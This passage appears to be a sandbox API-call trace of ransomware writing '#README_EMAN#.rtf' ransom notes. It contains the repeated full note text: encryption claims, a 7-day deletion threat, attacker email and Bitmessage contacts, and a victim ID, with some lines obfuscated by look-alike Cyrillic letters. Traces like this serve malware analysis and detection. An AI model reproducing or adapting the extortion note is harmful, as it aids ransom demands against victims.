m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0289.704] WriteFile (in: hFile=0x2cc, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.705] CloseHandle (hObject=0x2cc) returned 1 [0289.705] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\is\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\is\\#readme_eman#.rtf")) returned 0xffffffff [0289.705] GetLastError () returned 0x2 [0289.705] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\is\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\is\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0289.705] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.705] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b 